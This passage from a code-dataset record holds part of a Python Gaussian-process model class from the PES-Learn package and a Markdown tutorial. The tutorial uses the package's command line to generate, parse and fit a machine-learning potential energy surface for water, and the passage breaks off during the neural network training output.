data_in):\n prediction, v1 = model.predict(data_in, full_cov=False)\n return prediction \n\n def vet_model(self, model):\n \"\"\"Convenience method for getting model errors of test and full datasets\"\"\"\n pred_test = self.predict(model, self.Xtest)\n pred_full = self.predict(model, self.X)\n error_test = self.compute_error(self.ytest, pred_test, self.yscaler)\n error_full, median_error, max_errors = self.compute_error(self.y, pred_full, yscaler=self.yscaler, max_errors=5)\n print(\"Test Dataset {}\".format(round(hartree2cm * error_test,2)), end=' ')\n print(\"Full Dataset {}\".format(round(hartree2cm * error_full,2)), end=' ')\n print(\"Median error: {}\".format(np.round(median_error[0],2)), end=' ')\n print(\"Max 5 errors: {}\".format(np.sort(np.round(max_errors.flatten(),1))),'\\n')\n return error_test\n \n def preprocess(self, params, raw_X, raw_y):\n \"\"\"\n Preprocess raw data according to hyperparameters\n \"\"\"\n # TODO make more flexible. If keys don't exist, ignore them. smth like \"if key: if param['key']: do transform\"\n if params['morse_transform']['morse']:\n raw_X = morse(raw_X, params['morse_transform']['morse_alpha']) # Transform to morse variables (exp(-r/alpha))\n # Transform to FIs, degree reduce if called \n if params['pip']['pip']:\n # find path to fundamental invariants form molecule type AxByCz...\n #path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n path = os.path.join(fi_dir, self.molecule_type, \"output\")\n raw_X, degrees = interatomics_to_fundinvar(raw_X,path)\n if params['pip']['degree_reduction']:\n raw_X = degree_reduce(raw_X, degrees)\n \n if params['scale_X']:\n X, Xscaler = general_scaler(params['scale_X'], raw_X)\n else:\n X = raw_X\n Xscaler = None\n if params['scale_y']:\n y, yscaler = general_scaler(params['scale_y'], raw_y)\n else:\n y = raw_y\n yscaler = None\n return X, y, Xscaler, yscaler\n \n def optimize_model(self):\n print(\"Beginning hyperparameter optimization...\")\n print(\"Trying {} combinations of hyperparameters\".format(self.hp_maxit))\n print(\"Training with {} points (Full dataset contains {} points).\".format(self.ntrain, self.n_datapoints))\n print(\"Using {} training set point sampling.\".format(self.sampler))\n print(\"Errors are root-mean-square error in wavenumbers (cm-1)\")\n self.hyperopt_trials = Trials()\n self.itercount = 1 # keep track of hyperopt iterations \n if self.input_obj.keywords['rseed']:\n rstate = np.random.RandomState(self.input_obj.keywords['rseed'])\n else:\n rstate = None\n best = fmin(self.hyperopt_model,\n space=self.hyperparameter_space,\n algo=tpe.suggest,\n max_evals=self.hp_maxit*2,\n rstate=rstate, \n show_progressbar=False,\n trials=self.hyperopt_trials)\n hyperopt_complete()\n print(\"Best performing hyperparameters are:\")\n final = space_eval(self.hyperparameter_space, best)\n print(str(sorted(final.items())))\n self.optimal_hyperparameters = dict(final)\n # obtain final model from best hyperparameters\n print(\"Fine-tuning final model architecture...\")\n self.build_model(self.optimal_hyperparameters, nrestarts=10, maxit=1000)\n print(\"Final model performance (cm-1):\")\n self.test_error = self.vet_model(self.model)\n self.save_model(self.optimal_hyperparameters)\n\n def save_model(self, params):\n # Save model. Currently GPy requires saving training data in model for some reason. 
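GPy's to_dict(save_data=True) below serializes the training arrays too, so the generated compute_energy.py can rebuild the GP with Model.from_dict without refitting.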
\n model_dict = self.model.to_dict(save_data=True)\n print(\"Saving ML model data...\") \n model_path = \"model1_data\"\n while os.path.isdir(model_path):\n new = int(re.findall(\"\\d+\", model_path)[0]) + 1\n model_path = re.sub(\"\\d+\",str(new), model_path)\n os.mkdir(model_path)\n os.chdir(model_path)\n with open('model.json', 'w') as f:\n json.dump(model_dict, f)\n with open('hyperparameters', 'w') as f:\n print(params, file=f)\n \n if self.sampler == 'user_supplied':\n self.traindata.to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.testdata.to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n else:\n self.dataset.iloc[self.train_indices].to_csv('train_set',sep=',',index=False,float_format='%12.12f')\n self.dataset.iloc[self.test_indices].to_csv('test_set', sep=',', index=False, float_format='%12.12f')\n \n self.dataset.to_csv('PES.dat', sep=',',index=False,float_format='%12.12f')\n # write convenience function\n with open('compute_energy.py', 'w+') as f:\n print(self.write_convenience_function(), file=f)\n\n # print model performance\n sys.stdout = open('performance', 'w') \n self.vet_model(self.model)\n sys.stdout = sys.__stdout__\n os.chdir(\"../\")\n\n def transform_new_X(self, newX, params, Xscaler=None):\n \"\"\"\n Transform a new, raw input according to the model's transformation procedure \n so that prediction can be made.\n \"\"\"\n # ensure X dimension is n x m (n new points, m input variables)\n if len(newX.shape) == 1:\n newX = np.expand_dims(newX,0)\n elif len(newX.shape) > 2:\n raise Exception(\"Dimensions of input data is incorrect.\")\n if params['morse_transform']['morse']:\n newX = morse(newX, params['morse_transform']['morse_alpha'])\n if params['pip']['pip']:\n # find path to fundamental invariants for an N atom system with molecule type AxByCz...\n path = os.path.join(package_directory, \"lib\", self.molecule_type, \"output\")\n newX, degrees = interatomics_to_fundinvar(newX,path)\n if params['pip']['degree_reduction']:\n newX = degree_reduce(newX, degrees)\n if Xscaler:\n newX = Xscaler.transform(newX)\n return newX\n\n def transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.transform(newy)\n return newy\n\n def inverse_transform_new_y(self, newy, yscaler=None): \n if yscaler:\n newy = yscaler.inverse_transform(newy)\n return newy\n\n def write_convenience_function(self):\n string = \"from peslearn.ml import GaussianProcess\\nfrom peslearn import InputProcessor\\nfrom GPy.core.model import Model\\nimport numpy as np\\nimport json\\nfrom itertools import combinations\\n\\n\"\n if self.pip:\n string += \"gp = GaussianProcess('PES.dat', InputProcessor(''), molecule_type='{}')\\n\".format(self.molecule_type)\n else:\n string += \"gp = GaussianProcess('PES.dat', InputProcessor(''))\\n\"\n with open('hyperparameters', 'r') as f:\n hyperparameters = f.read()\n string += \"params = {}\\n\".format(hyperparameters)\n string += \"X, y, Xscaler, yscaler = gp.preprocess(params, gp.raw_X, gp.raw_y)\\n\"\n string += \"model = Model('mymodel')\\n\"\n string += \"with open('model.json', 'r') as f:\\n\"\n string += \" model_dict = json.load(f)\\n\"\n string += \"final = model.from_dict(model_dict)\\n\\n\"\n string += gp_convenience_function\n return string\n\n\n" }, { "alpha_fraction": 0.6063318252563477, "alphanum_fraction": 0.6983574032783508, "avg_line_length": 50.40467071533203, "blob_id": "8626a962aa53fb9464cc4125d7fba0e89fb21e39", "content_id": "cbd882bc2d638025cd60be0051701d1ba6fd721f", "detected_licenses": [ 
"BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 52844, "license_type": "permissive", "max_line_length": 846, "num_lines": 1028, "path": "/1_Tutorials/0_water_pes_command_line_interface/cli_tutorial.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn Command-Line Interface Tutorial\n\nPES-Learn is designed to work similarly to standard electronic structure theory packages: users can generate an input file with appropriate keywords, run the software, and get a result. This tutorial covers how to do exactly that.\nHere we generate a machine-learning model of the PES of water from start to finish (no knowledge of Python required!).\n\n## 1. Generating Data\n\n### 1.1 Defining an internal coordinate grid\nCurrently PES-Learn supports generating points across PESs by displacing in simple internal coordinates (a 'Z-Matrix'). To do this, we must define a Z-Matrix in the input file. We first create an input file called `input.dat`:\n\n```console\nhome:~$ vi input.dat\n```\n\nin the input file we define the Z-Matrix and the displacements:\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n```\n\nThe syntax defining the internal coordinate ranges is of the form [start, stop, number of points], with the bounds included in the number of points. The angles and dihedrals are always specified in degrees. The units of length can be anything, though typically Angstrom or Bohr. Dummy atoms are supported (and in fact, are required if there are 3 or more co-linear atoms, otherwise in that case those internal coordinate configurations will just be deleted!). Labels for geometry parameters can be anything (RDUM, ROH1, A120, etc) as long as they do not start with a number. Parameters can be fixed with `r1 = 1.0`, etc. An equilibruim geometry can be specified in the order the internal coordinates appear with\n```python\neq_geom = [0.96,0.96,104.5]\n```\nand this will also be included. \n\n### 1.2 Creating a Template file\n\nNormally we would go on to build our input file by adding keywords controlling the program, but first let's talk about **template input files**. A template input file is a file named `template.dat` which is a **cartesian coordinate input file for an electronic structure theory package** such as Gaussian, Molpro, Psi4, CFOUR, QChem, NWChem, and so on. It does not matter what package you want to use, it only matters that the `template.dat` contains Cartesian coordinates, and computes an electronic energy by whatever means you wish. PES-Learn will use the template file to generate a bunch of (Guassian, Molpro, Psi4, etc) input files, each with different Cartesian geometries corresponding to the above internal coordinate grid. The template input file we will use in this example is a Psi4 input file which computes a CCSD(T)/cc-pvdz energy:\n```python\nmolecule h2o {\n0 1\nH 0.00 0.00 0.00\nH 0.00 0.00 0.00\nO 0.00 0.00 0.00\n}\n\nset {\nreference rhf\nbasis cc-pvdz\n}\nenergy('ccsd(t)')\n```\n\nThe actual contents of the Cartesian coordinates does not matter. 
Later on when we run the code, the auto-generated input files with Cartesian geometries corresponding to our internal coordinate grid will be put into their own newly-created sub-directories like this:\n```\nPES_data/1/\nPES_data/2/\nPES_data/3/\n...\n```\n\nThis PES_data folder can then be zipped up and sent to whatever computing resources you want to use.\n\n### 1.3 Data Generation Keywords\n\nLet's go back to our PES-Learn input file, add a few keywords, and discuss them.\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n```\nComments (ignored text) can be specified with a `#` sign. All entries are case-insensitive. Multiple-word phrases are separated with an underscore. Text that doesn't match any keywords is simply ignored (in this way, the use of comment lines is really not necessary unless you are commenting out keyword options). **This means if you spell a keyword or its value incorrectly it will be ignored**. The first occurrence of a keyword will be used.\n\n* We discussed **`eq_geom`** before; it is a geometry forced into the dataset, and it would typically correspond to the global minimum at the level of theory you are using. It is often a good idea to create your dataset such that the minimum of the dataset is the true minimum of the surface, especially for vibrational levels applications. \n\n* **`input_name`** tells PES-Learn what to call the electronic structure theory input files. `'input.dat'` is the default value, so it normally does not need to be set. Note that it is surrounded in quotes; this is so PES-Learn doesn't touch it or change anything about it, such as lowering the case of all the letters. \n\n* **`remove_redundancy`** removes symmetry-redundant geometries from the internal coordinate grid. In this case, there is redundancy in the equivalent OH bonds and they will be removed. \n\n* **`remember_redundancy`** keeps a cache of redundant-geometry pairs, so that when the energies are parsed from the output files and the dataset is created later on, all of the original geometries are kept in the dataset, with duplicate energies for redundant geometries. If one does not use a permutation-invariant geometry for ML later, this may be useful.\n\n* **`grid_reduction`** reduces the grid size to the value entered. In this case it means only 300 geometries will be created. This is done by finding the Euclidean distances between all the points in the dataset, and extracting a maximally spaced 'sub-grid' of the size specified. \n\n### 1.4 Running the code and generating the data\n\nIn the directory containing the PES-Learn input file `input.dat` and `template.dat`, simply run \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\n```\nThe code will then ask what you want to do; here we type `g` or `generate` and hit enter, and this is the output:\n```\nDo you want to 'generate' data, 'parse' data, or 'learn'?g\n\n1000 internal coordinate displacements generated in 0.00741 seconds\nTotal displacements: 1001\nNumber of interatomic distances: 3\nGeometry grid generated in 0.06 seconds\nRemoving symmetry-redundant geometries... 
Redundancy removal took 0.01 seconds\nRemoved 450 redundant geometries from a set of 1001 geometries\nReducing size of configuration space from 551 datapoints to 300 datapoints\nConfiguration space reduction complete in 0.05 seconds\nYour PES inputs are now generated. Run the jobs in the PES_data directory and then parse.\nData generation finished in 0.41 seconds\nTotal run time: 0.41 seconds\n```\n\nThe 300 Psi4 input files with Cartesian coordinates corresponding to our internal coordinate grid are now placed into a directory called `PES_data`:\n```\nPES_data/1/\nPES_data/2/\nPES_data/3/\n...\n```\n\n**Quick note:** you do not have to use the command line to specify whether you want to `generate`, `parse`, or `learn`; you can instead specify the `mode` keyword in the input file:\n```python\nmode = generate # or 'parse' or 'learn', or shorthand: 'g', 'p', 'l'\n```\nThis is at times convenient if computations are submitted remotely in an automated fashion, and the users are not directly interacting with a command line.\n\nWe are now ready to run the Psi4 energy computations.\n\n## 2. Parsing Output files to collect electronic energies\n\nNow that every Psi4 input file has been run, and there is a corresponding `output.dat` in each sub-directory of `PES_data`, we are ready to use PES-Learn to grab all of the energies, match them with the appropriate geometries, and create a dataset. \n\nThere are two schemes for parsing output files with PES-Learn:\n * User-supplied Python regular expressions\n * cclib\n \n**Regular expressions** are a pattern-matching syntax. Though they are somewhat tedious to use, they are completely general. Using the regular expression scheme requires:\n 1. Inspecting the electronic structure theory software output file\n 2. Finding the line where the desired energy is \n 3. Writing a regular expression to match the line's text and grab the desired energy.\n \n**cclib** is a Python library of hard-coded parsing routines. It works in a lot of cases. At the time of writing, cclib supports parsing `scfenergies`, `mpenergies`, and `ccenergies`. These different modes attempt to find the highest level of theory SCF energy (Hartree-Fock or DFT), the highest level of Moller-Plesset perturbation theory energy, or the highest level of theory coupled cluster energy. Since these are hard-coded routines that are version-dependent, there is no guarantee it will work! It is also a bit slower than regular expressions (i.e. milliseconds --> seconds slower).\n\n\n### 2.1 Setting the appropriate parsing keywords in the PES-Learn input file\n\nIt is often a good idea to take a look at a successful output file in `PES_data/`. Here is the output file in `PES_data/1/`, which is the geometry corresponding to `eq_geom` defined earlier:\n\n```\n **************************\n * *\n * CCTRIPLES *\n * *\n **************************\n\n\n Wave function = CCSD_T\n Reference wfn = RHF\n\n Nuclear Rep. 
energy (wfn) = 9.168193296244223\n SCF energy (wfn) = -76.026653661887252\n Reference energy (file100) = -76.026653661887366\n CCSD energy (file100) = -0.213480496782495\n Total CCSD energy (file100) = -76.240134158669861\n\n Number of ijk index combinations: 35\n Memory available in words : 65536000\n ~Words needed per explicit thread: 2048\n Number of threads for explicit ijk threading: 1\n\n MKL num_threads set to 1 for explicit threading.\n\n (T) energy = -0.003068821713392\n * CCSD(T) total energy = -76.243202980383259\n\n\n Psi4 stopped on: Thursday, 09 May 2019 01:51PM\n Psi4 wall time for execution: 0:00:01.05\n\n*** Psi4 exiting successfully. Buy a developer a beer!\n```\n\nIf we were to use cclib, we would put into our PES-Learn `input.dat` file:\n```python\n# Parsing-relevant keywords\nenergy = cclib\nenergy_cclib = ccenergies\n```\nto grab coupled cluster energies. **Unfortunately, at the time of writing, this only grabbed the CCSD energies and not the CCSD(T) energies (it's a good idea to always check).** Let's use regular expressions instead.\n\n### 2.1.1 Regular expressions\n\nOne fact is always very important to keep in mind when using regular expressions in PES-Learn: \n**PES-Learn always grabs the last matching entry in the output file** \nThis is good to know, since a pattern may match multiple entries in the output file, but it's okay as long as you want the *last one*.\n\nWe observe that the energy we want is always contained in a line like \n```\n * CCSD(T) total energy = -76.243202980383259\n```\n\nSo the general pattern we want to match is `total energy` (whitespace) `=` (whitespace) (negative floating point number). We may put into our PES-Learn input file the following regular expression:\n```python\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\\s+=\\\s+(-\\\d+\\\.\\\d+)'\n```\n\nHere we have taken advantage of the fact that the pattern `total energy` does not appear anymore after the CCSD(T) energy in the output file. The above `energy_regex` line matches the words 'total energy' followed by one or more whitespaces `\\\s+`, an equal sign `=`, one or more whitespaces `\\\s+`, and then a negative floating point number `-\\\d+\\\.\\\d+` which we have necessarily enclosed in parentheses to indicate that we only want to capture the number itself, not the whole line. This is a bit cumbersome to use, so if this is foreign to you I recommend trying out various regular expressions via trial and error using Pythex https://pythex.org/ to ensure that the pattern is matched.\n\nA few other valid `energy_regex` lines would be\n```python\nenergy_regex = 'CCSD\\\(T\\\) total energy\\\s+=\\\s+(-\\\d+\\\.\\\d+)'\n```\n```python\nenergy_regex = '=\\\s+(-\\\d+\\\.\\\d+)'\n```\nNote above that we had to \"escape\" the parentheses with backslashes [since they are reserved characters.](https://www.debuggex.com/cheatsheet/regex/python)\nIf you want to be safe from parsing the wrong energy, a more verbose pattern is probably better.\n\n### 2.2 Setting up the input file\nHere we have added our parsing keywords to our PES-Learn input file. 
(We could have had these keywords defined earlier as well, but to keep things simple I am only adding them when needed.)\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\s+=\\s+(-\\d+\\.\\d+)'\npes_name = 'PES.dat'\nsort_pes = true # sort in terms of increasing energy\npes_format = interatomics # could also choose internal coordinates r1, r2, a1\n```\n\n### 2.3 Parsing the output files and creating a dataset\nJust as before, we run PES-Learn, and this time choose `parse` by typing `p` and hitting enter:\n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?p\nParsed data has been written to PES.dat\nTotal run time: 0.38 seconds\n```\n\nThe dataset `PES.dat` looks like this:\n```python\nr0,r1,r2,E\n1.518123981600,0.960000000000,0.960000000000,-76.243202980383\n1.455484441900,0.950000000000,0.950000000000,-76.242743191056\n1.494132369500,1.000000000000,0.950000000000,-76.242037809799\n1.568831329800,1.000000000000,1.000000000000,-76.241196021922\n1.494050142500,1.000000000000,1.000000000000,-76.240995054410\n```\n\n\n## 3. Creating Auto-Generated Machine Learning Models of the Potential Energy Surface\n\n### 3.1 Gaussian Process Regression\n\nWe now have in our working directory a file called `PES.dat`, created with the routine above. An auto-optimized machine learning model of the surface can be produced by this dataset. Below we have added keywords to our PES-Learn input file which are relevant to training a ML model\n\n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\nr1 = [0.85, 1.30, 10]\nr2 = [0.85, 1.30, 10]\na1 = [90.0, 120.0, 10] \n\n# Data generation-relevant keywords\neq_geom = [0.96,0.96,104.5]\ninput_name = 'input.dat'\nremove_redundancy = true\nremember_redundancy = false\ngrid_reduction = 300\n\n# Parsing-relevant keywords\nenergy = regex\nenergy_regex = 'total energy\\s+=\\s+(-\\d+\\.\\d+)'\npes_name = 'PES.dat'\nsort_pes = true # sort in terms of increasing energy\npes_format = interatomics # could also choose internal coordinates r1, r2, a1\n\n# ML-relevant keywords\nml_model = gp # Use Gaussian Process regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\n```\n\nWe note that a **minimal working input file** would only need the internal coordinate definition (because we are using PIPs and need to know the atom types!) 
and the ML relevant keywords:\n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\n# ML-relevant keywords\nml_model = gp # Use Gaussian Process regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\n```\n\nrunning the following tries out several models and prints the performance statistics in units of wavenumbers (cm$^{-1}$):\n\n<details>\n <summary>Click to expand and see all hyperparameter iterations</summary>\n \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?l\nUsing permutation invariant polynomial transformation for molecule type A2B\nBeginning hyperparameter optimization...\nTrying 15 combinations of hyperparameters\nTraining with 200 points (Full dataset contains 300 points).\nUsing structure_based training set point sampling.\nErrors are root-mean-square error in wavenumbers (cm-1)\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.36\nMedian error: 4.18\nMax 5 errors: [11.3 11.4 11.9 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 2.0}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.94\nFull Dataset 0.77\nMedian error: 0.53\nMax 5 errors: [1.9 2. 2. 2. 2.2]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.55\nFull Dataset 0.51\nMedian error: 0.33\nMax 5 errors: [1.2 1.3 1.3 1.5 1.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'std'}\nTest Dataset 0.52\nFull Dataset 0.42\nMedian error: 0.26\nMax 5 errors: [1.1 1.1 1.1 1.2 1.2]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'std', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.36\nMedian error: 4.17\nMax 5 errors: [11.4 11.5 11.9 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'std', 'scale_y': 'mm01'}\nTest Dataset 0.86\nFull Dataset 0.81\nMedian error: 0.52\nMax 5 errors: [2. 2. 2.2 2.3 3. 
]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm11', 'scale_y': 'mm11'}\nTest Dataset 0.54\nFull Dataset 0.49\nMedian error: 0.35\nMax 5 errors: [1.2 1.2 1.2 1.2 1.4]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.2000000000000002}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm01', 'scale_y': None}\nTest Dataset 9.84\nFull Dataset 8.51\nMedian error: 6.29\nMax 5 errors: [19.4 20.4 20.5 21.1 25.2]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'std'}\nTest Dataset 0.28\nFull Dataset 0.24\nMedian error: 0.15\nMax 5 errors: [0.7 0.8 0.8 1.2 1.4]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': None, 'scale_y': 'mm01'}\nTest Dataset 0.91\nFull Dataset 0.87\nMedian error: 0.57\nMax 5 errors: [2.2 2.2 2.3 2.4 2.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'mm01'}\nTest Dataset 0.97\nFull Dataset 0.9\nMedian error: 0.61\nMax 5 errors: [2.2 2.3 2.4 2.5 2.8]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm11', 'scale_y': None}\nTest Dataset 5.38\nFull Dataset 5.37\nMedian error: 4.15\nMax 5 errors: [11.4 11.5 12. 12.7 13.9]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.3}, 'pip': {'degree_reduction': False, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'mm01'}\nTest Dataset 1.37\nFull Dataset 1.06\nMedian error: 0.57\nMax 5 errors: [3.2 3.2 3.3 3.5 3.7]\nHyperparameters: \n{'morse_transform': {'morse': False}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm11', 'scale_y': None}\nTest Dataset 5.7\nFull Dataset 5.68\nMedian error: 4.33\nMax 5 errors: [13. 13.8 14.7 14.7 15.1]\nHyperparameters: \n{'morse_transform': {'morse': True, 'morse_alpha': 1.5}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': 'mm01', 'scale_y': 'mm01'}\nTest Dataset 1.3\nFull Dataset 1.03\nMedian error: 0.65\nMax 5 errors: [2.9 2.9 3. 3. 3.1]\n\n###################################################\n# #\n# Hyperparameter Optimization Complete!!! #\n# #\n###################################################\n\nBest performing hyperparameters are:\n[('morse_transform', {'morse': True, 'morse_alpha': 1.8}), ('pip', {'degree_reduction': True, 'pip': True}), ('scale_X', None), ('scale_y', 'std')]\nFine-tuning final model architecture...\nHyperparameters: {'morse_transform': {'morse': True, 'morse_alpha': 1.8}, 'pip': {'degree_reduction': True, 'pip': True}, 'scale_X': None, 'scale_y': 'std'}\nFinal model performance (cm-1):\nTest Dataset 0.28 Full Dataset 0.24 Median error: 0.15 Max 5 errors: [0.7 0.8 0.8 1.2 1.4] \n\nSaving ML model data...\nTotal run time: 66.25 seconds\n```\n</details>\n\n \n \nTraining with just 200 points, the best model had a RMSE on the 100-point test set of 0.28 cm$^{-1}$, and the full 300 point dataset had a RMSE of 0.24 cm$^{-1}$. This is absurdly accurate; it's a good thing we used `grid_reduction` back when generating our data to reduce our dataset from 551 points to just 300! We clearly did not need more than a few hundred points to model this portion of the PES of water; any more computations would have been unnecessary! 
This is why it is important to probe how much data one needs along the surface at a **meaningful but low level of theory**. \n\n### 3.2 Using the GP model\n\nAfter running the above, PES-Learn creates a directory `model1data` (subsequently trained models will not overwrite this, but instead create new directories `model2data`, `model3data`, etc.). Inside this directory is a variety of files which are self-explanatory. \n\nThe most important file is the auto-generated Python script `compute_energy.py` which can be used to evaluate new energies using the model. It needs to be in the same directory as `PES.dat` and `model.json` to work. It contains a function `pes()` which takes one or more cartesian or internal coordinate arguments and outputs one or more energies corresponding to the geometries. If the argument `cartesian=False` is set, you must supply coordinates in the exact same format and exact same order as the model was trained on (i.e. the format in `PES.dat`). If the argument `cartesian=True` is set, cartesian coordinates are supplied in the same order as given in a typical PES_data input file (not the template.dat file). **Cartesians can only be supplied if the model was trained on interatomic distances or PIPs of the interatomic distances.**\n\nThe `compute_energy.py` file can be imported and used. Here's an example python script `use_model.py` which imports the `pes` function and evaluates some energies at some cartesian geometries.\n\n```python\nfrom compute_energy import pes\n\ncart_geoms = [[0.0000000000, 0.0000000000, 1.1000000000, 0.0000000000, 0.7361215932, -0.4250000000, 0.0000000000, 0.0000000000, 0.0000000000],\n [0.0000000000, 0.2000000000, 1.2000000000, 0.0000000000, 0.7461215932, -0.4150000000, 0.0000000000, 0.0000000000, 0.1000000000],\n [0.0000000000, 0.1000000000, 1.3000000000, 0.0000000000, 0.7561215932, -0.4350000000, 0.0000000000, 0.0000000000, 0.2000000000]]\n\nenergies1 = pes(cart_geoms)\nprint(energies1)\n\ninteratomic_geoms = [[1.494050142500,1.000000000000,1.000000000000],\n [1.597603916000,1.000000000000,0.950000000000],\n [1.418793563200,1.000000000000,0.950000000000]]\n\nenergies2 = pes(interatomic_geoms, cartesian=False)\nprint(energies2)\n```\nThe print statements yield the following output. The energy is in units of Hartrees (which are the unit of energy in our PES.dat which the model was trained on).\n\n```\n[[-76.20462724]\n [-76.21835841]\n [-76.21467994]]\n[[-76.24099496]\n [-76.24031118]\n [-76.24024971]]\n```\n\n\n### 3.3 Neural Network Regression\n\nNeural networks (NNs) are recommended for training sets of size 1000 and above for efficiency. This is because the hyperparameter tuning of NNs takes much longer than GPs, so there is an initial up-front cost to training NNs that GPs do not have. The NN building code can be broken down into three steps:\n* Neural architecture search (NAS)\n* Hyperparameter tuning\n* Learning rate optimization\n\nEarly stopping is used more aggressively in the first steps than in the last. Therefore, the performance of models during the NAS and hyperparameter tuning steps should not be taken as final; the training of the models is being stopped early to save time. \n\nBatch learning with the L-BFGS optimizer is currently the only option. For high-level regression tasks, it is far superior to 1st order optimizers such as Adam, SGD, and RMSProp. \n\nThe Neural Architecture Search (NAS) tries out several hidden layer structures. 
One can override the default NAS hidden layer structures with the keyword `nas_trial_layers`, using the syntax `nas_trial_layers = [[32], [32,32], [256]]`, which would try out NNs with a single hidden layer of 32 nodes, two hidden layers with 32 nodes each, and a single hidden layer of 256 nodes. The default NAS space is very large, so if you observe on your first run with the default NAS space that your dataset does better with a large number of nodes ([256,256] for example) you may consider restricting the NAS space on future runs using the `nas_trial_layers` keyword. There should be at least 3 hidden layer structures in the NAS space.\n\nHyperparameter tuning is similar to the GP model optimizer. The learning rate optimizer is self-explanatory. There are checks in place to detect performance plateaus (in which case learning rate decay is triggered) and overfitting (in which case training is halted).\n\nFor neural networks, a validation set must be specified since they are more prone to overfitting. The validation points are sampled from all points which are not training set points. If one does not specify a number of validation points, by default half of the test set points are converted to validation set points. If your dataset has 1000 points and 800 are used for training, there would by default be 100 validation points and 100 test points. The validation error is used to optimize hyperparameters, while the test set error is not used for anything, though it is printed in all cases. \n\nA neural network can be trained with minimal modification of the GP input used previously: \n\n```python\nO\nH 1 r1\nH 1 r2 2 a1\n\n# ML-relevant keywords\nml_model = nn # Use Neural Network regression\npes_format = interatomics # Geometry values in the PES file\nuse_pips = true # Transform interatomic distances into permutation invariant polynomials\nhp_maxit = 15 # Train 15 models with hyperparameter optimization, select the best\ntraining_points = 200 # Train with 200 points (out of 300 total)\nvalidation_points = 50 # Validate with 50 points (50 left over for testing)\nsampling = structure_based # Sample training set by maximizing Euclidean distances\nn_low_energy_train = 1 # Force lowest energy point into training set\nnas_trial_layers = [[32], [32,32], [64], [16,16,16]] # NAS hidden layer trial structures\n```\n\nThe output of PES-Learn is: \n\n<details>\n <summary>Click to expand and see neural network optimization output</summary>\n \n```console\nhome:~$ python path/to/PES-Learn/peslearn/driver.py\nDo you want to 'generate' data, 'parse' data, or 'learn'?l\nUsing permutation invariant polynomial transformation for molecule type A2B\nNumber of validation points not specified. Splitting test set in half --> 50% test, 50% validation\nTraining with 200 points. Validating with 50 points. 
